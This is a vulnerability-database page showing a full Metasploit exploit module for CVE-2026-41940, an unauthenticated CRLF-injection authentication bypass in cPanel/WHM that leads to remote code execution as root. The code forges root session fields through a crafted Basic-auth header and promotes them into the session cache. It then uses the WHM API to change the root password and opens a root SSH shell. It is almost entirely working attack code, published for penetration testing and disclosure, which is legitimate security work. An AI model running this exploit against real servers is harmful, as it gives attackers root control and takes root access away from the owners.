Lucene search
K

cPanel/WHM CRLF Injection Authentication Bypass RCE

🗓️ 18 May 2026 19:02:36Reported by Sina Kheirkhah, Adam Kues, Shubham Shah, Crypto-CatType 
metasploit
 metasploit
🔗 www.rapid7.com👁 392 Views

CRLF injection in cpsrvd enables unauthenticated root RCE in cPanel/WHM CVE-2026-41940.

Related
Code
# frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH
  include Msf::Exploit::Retry
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'cPanel/WHM CRLF Injection Authentication Bypass RCE',
        'Description' => %q{
          Exploits CVE-2026-41940, a CRLF injection in cPanel/WHM's cpsrvd daemon
          that allows unauthenticated remote code execution as root.

          The Basic-auth handler writes the password to the raw session file without
          stripping newlines. Omitting the ob-part of the session cookie bypasses the
          encoder, so injected fields land verbatim in the raw file. A subsequent
          request to /scripts2/listaccts triggers Cpanel::Session::Modify to promote
          those fields into the authoritative session cache, granting root WHM access.

          RCE uses the WHM JSON API passwd endpoint to set a temporary root password,
          then delivers the payload over SSH. The password is rotated after exploitation.
          This module does not restore the original root password.

          Affects all versions after 11.40. Fixed per branch: 11.86.0.41, 11.110.0.97,
          11.118.0.63, 11.124.0.35, 11.126.0.54, 11.130.0.19, 11.132.0.29, 11.134.0.20,
          11.136.0.5 (cPanel/WHM) and 136.1.7 (WP2).
        },
        'Author' => [
          'Sina Kheirkhah', # Initial analysis and PoC (watchTowr)
          'Adam Kues',      # High-fidelity check technique (SLC Cyber)
          'Shubham Shah',   # High-fidelity check technique (SLC Cyber)
          'Crypto-Cat',     # Metasploit module (Rapid7)
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2026-41940'],
          ['EDB', '52574'],
          ['URL', 'https://support.cpanel.net/hc/en-us/articles/40073787579671'],
          ['URL', 'https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/'],
          ['URL', 'https://slcyber.io/research-center/high-fidelity-check-for-the-cpanel-authentication-bypass-cve-2026-41940/'],
          ['URL', 'https://www.rapid7.com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass/'],
        ],
        'DisclosureDate' => '2026-04-28',
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Privileged' => true,
        'Targets' => [
          ['Automatic', {}],
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 2087,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'WHM base path', '/']),
      OptPort.new('SSHPORT', [true, 'SSH port on the target', 22])
    ])

    register_advanced_options([
      OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),
      OptInt.new('VerifyTimeout', [true, 'Seconds to wait for auth bypass to be confirmed after session cache promotion', 10])
    ])
  end

  def mint_session
    # Random username avoids cpHulk lockout; any user works on WHM for session minting
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'login'),
      'vars_get' => { 'login_only' => '1' },
      'vars_post' => { 'user' => Rex::Text.rand_text_alpha(8), 'pass' => Rex::Text.rand_text_alpha(12) }
    )
    fail_with(Failure::Unreachable, 'No response from /login') unless res

    # MSF joins multiple Set-Cookie headers into one string; use get_cookies
    m = res.get_cookies.match(/(?:\A|;\s*)whostmgrsession=([^;,\s]+)/i)
    fail_with(Failure::UnexpectedReply, 'No whostmgrsession cookie in /login response') unless m

    session_name = Rex::Text.uri_decode(m[1]).split(',', 2).first
    vprint_status("Session name: #{session_name}")
    session_name
  end

  def inject_session_fields(session_name)
    # \xff prefix bypasses set_pass() \x00 check; LF-only separates injected fields
    raw_creds = "root:\xff\nsuccessful_internal_auth_with_timestamp=9999999999\nuser=root\ntfa_verified=1\nhasroot=1"
    cookie_enc = Rex::Text.uri_encode(session_name)

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Authorization' => "Basic #{Rex::Text.encode_base64(raw_creds)}",
        'Cookie' => "whostmgrsession=#{cookie_enc}"
      }
    )
    fail_with(Failure::Unreachable, 'No response from /') unless res

    m = res.headers['Location'].to_s.match(%r{(/cpsess\d{10})})
    fail_with(Failure::NotVulnerable, "No /cpsessXXXX token in redirect (HTTP #{res.code}). Target may be patched.") unless m

    vprint_status("Security token: #{m[1]}")
    m[1]
  end

  def promote_session_cache(session_name)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'scripts2', 'listaccts'),
      'headers' => { 'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}" }
    )
    fail_with(Failure::Unreachable, 'No response from /scripts2/listaccts') unless res
    fail_with(Failure::UnexpectedReply, "Unexpected response from listaccts (HTTP #{res.code})") unless res.code == 401

    vprint_status('Session fields promoted to cache')
  end

  def verify_auth_bypass(session_name, token)
    # Retry until /json-api/version confirms auth or VerifyTimeout is reached.
    # do_token_denied promotes the raw session fields to the JSON cache asynchronously;
    # the first attempt may arrive before cpsrvd finishes writing the JSON cache file.
    retry_until_truthy(timeout: datastore['VerifyTimeout']) do
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, token, 'json-api', 'version'),
        'headers' => { 'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}" }
      )
      res&.code == 200 && res.body.to_s.include?('"version"')
    end
  end

  def whm_api_call(session_name, token, function, params = {})
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, token, 'json-api', function),
      'vars_get' => { 'api.version' => '1' },
      'vars_post' => params,
      'headers' => { 'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}" }
    )
    fail_with(Failure::Unreachable, "No response from json-api/#{function}") unless res

    res
  end

  def check
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'login'),
      'vars_get' => { 'login_only' => '1' },
      'vars_post' => { 'user' => Rex::Text.rand_text_alpha(8), 'pass' => Rex::Text.rand_text_alpha(12) }
    )
    return CheckCode::Unknown('No response from /login') unless res

    m = res.get_cookies.match(/(?:\A|;\s*)whostmgrsession=([^;,\s]+)/i)
    return CheckCode::Unknown('No whostmgrsession cookie from /login') unless m

    cookie_full_raw = m[1]
    session_name = Rex::Text.uri_decode(cookie_full_raw).split(',', 2).first

    # Inject expired=1 for a throwaway user to avoid lockout risk
    b64 = Rex::Text.encode_base64("u#{Rex::Text.rand_text_hex(10)}:\xff\nexpired=1")

    res2 = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Authorization' => "Basic #{b64}",
        'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}"
      }
    )
    return CheckCode::Detected('Service is running but injection endpoint did not respond') unless res2

    m2 = res2.headers['Location'].to_s.match(%r{(/cpsess\d{10})})
    return CheckCode::Safe('No cpsess token - injection did not land') unless m2

    # On a vulnerable target the injected expired=1 surfaces in the session page body
    res3 = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, m2[1], '/'),
      'headers' => { 'Cookie' => "whostmgrsession=#{cookie_full_raw}" }
    )
    return CheckCode::Detected('Service is running and injection landed (cpsess token obtained), but verification request did not respond') unless res3

    body = res3.body.to_s
    if body.include?('msg_code:[expired_session]')
      return CheckCode::Vulnerable('CRLF injection confirmed: expired_session marker detected')
    end

    CheckCode::Safe('Injection payload was filtered - target appears patched')
  end

  def exploit
    if datastore['DefangedMode']
      fail_with(Failure::BadConfig, <<~MSG.squish)
        This module permanently changes the root password on the target system
        and does not restore the original value. Set DefangedMode to false if
        you have authorization to proceed.
      MSG
    end

    tmp_pass = Rex::Text.rand_text_alphanumeric(16) + '!aA1'

    print_status('Minting pre-auth session')
    session_name = mint_session

    print_status('Injecting session fields via CRLF')
    token = inject_session_fields(session_name)

    print_status('Triggering session cache promotion')
    promote_session_cache(session_name)

    print_status('Verifying WHM root access')
    fail_with(Failure::NotVulnerable, 'Auth bypass failed') unless verify_auth_bypass(session_name, token)
    print_good('Auth bypass successful - root WHM session obtained')

    report_vuln(
      host: rhost,
      port: rport,
      proto: 'tcp',
      name: 'cPanel/WHM CRLF Injection Authentication Bypass (CVE-2026-41940)',
      info: 'Unauthenticated root WHM session via CRLF injection in cpsrvd session handling',
      refs: references
    )

    print_status('Setting temporary root password')
    res = whm_api_call(session_name, token, 'passwd', 'user' => 'root', 'password' => tmp_pass)
    body = res.body.to_s
    passwd_json = nil
    begin
      passwd_json = res.get_json_document
    rescue StandardError
      nil
    end

    if res.code == 500 && body.include?('License')
      fail_with(Failure::NoAccess, 'WHM passwd API requires a valid cPanel license')
    end

    # cPanel versions have two different passwd API response formats:
    # - Older versions: {"status": 1, ...}
    # - Newer versions: {"metadata": {"result": 1}, ...}
    # Accept either to maintain compatibility across versions.
    passwd_ok = passwd_json&.[]('status') == 1 || passwd_json&.dig('metadata', 'result') == 1
    unless res.code == 200 && passwd_ok
      fail_with(Failure::UnexpectedReply, "passwd API returned HTTP #{res.code}: #{body[0..200]}")
    end
    @tmp_pass_set = true
    print_good('Root password set')

    print_status('Connecting via SSH')
    ssh = nil
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, 'root', ssh_client_defaults.merge(
          auth_methods: ['password'],
          password: tmp_pass,
          port: datastore['SSHPORT']
        ))
      end
    rescue ::Net::SSH::AuthenticationFailed => e
      restore_passwd(session_name, token)
      fail_with(Failure::NoAccess, "SSH authentication failed: #{e.message}")
    rescue ::Net::SSH::Exception, ::Timeout::Error, ::EOFError => e
      restore_passwd(session_name, token)
      fail_with(Failure::Unreachable, "SSH connection failed: #{e.message}")
    end

    # Use the SSH channel directly as the session.
    # handler(conn.lsock) must be the LAST call - it notifies the session waiter
    # event that ExploitDriver polls after exploit() returns.
    conn = Net::SSH::CommandStream.new(ssh, logger: self)

    # Rotate the temporary password before handing off to the session.
    # This ensures the temp cred is short-lived even if the operator never
    # backgrounds the shell.
    if @tmp_pass_set
      print_status('Rotating root password')
      new_pass = Rex::Text.rand_text_alphanumeric(20) + '!aA1'
      rotated = false
      begin
        whm_api_call(session_name, token, 'passwd', 'user' => 'root', 'password' => new_pass)
        print_good('Root password rotated')
        @tmp_pass_set = false
        rotated = true
      rescue StandardError
        # If the passwd call fails (likely due to session expiration before rotation),
        # re-exploit to get a fresh auth bypass session and retry rotation.
        begin
          sn2 = mint_session
          tok2 = inject_session_fields(sn2)
          promote_session_cache(sn2)
          whm_api_call(sn2, tok2, 'passwd', 'user' => 'root', 'password' => new_pass)
          print_good('Root password rotated')
          @tmp_pass_set = false
          rotated = true
        rescue StandardError => e
          print_warning("Could not rotate root password: #{e.message}")
          print_warning('Root password may still be set to the temporary value')
        end
      end

      # Store credential separately so a database error does not trigger re-exploitation.
      # origin_type :service is required by create_credential_and_login when service_data
      # is explicitly provided.
      if rotated
        begin
          store_valid_credential(
            user: 'root',
            private: new_pass,
            service_data: {
              origin_type: :service,
              address: rhost,
              port: datastore['SSHPORT'],
              service_name: 'ssh',
              protocol: 'tcp',
              workspace_id: myworkspace_id
            }
          )
        rescue StandardError => e
          vprint_warning("Could not save credential to database: #{e.message}")
        end
      end
    end

    handler(conn.lsock)
  ensure
    # If an exception was raised after password change but before session opens,
    # warn the operator that temporary credentials may still be active.
    if @tmp_pass_set
      print_warning('Root password may still be set to the temporary value')
    end
  end

  private

  def restore_passwd(session_name, token)
    whm_api_call(session_name, token, 'passwd',
                 'user' => 'root', 'password' => Rex::Text.rand_text_alphanumeric(20) + '!aA1')
  rescue StandardError
    nil
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation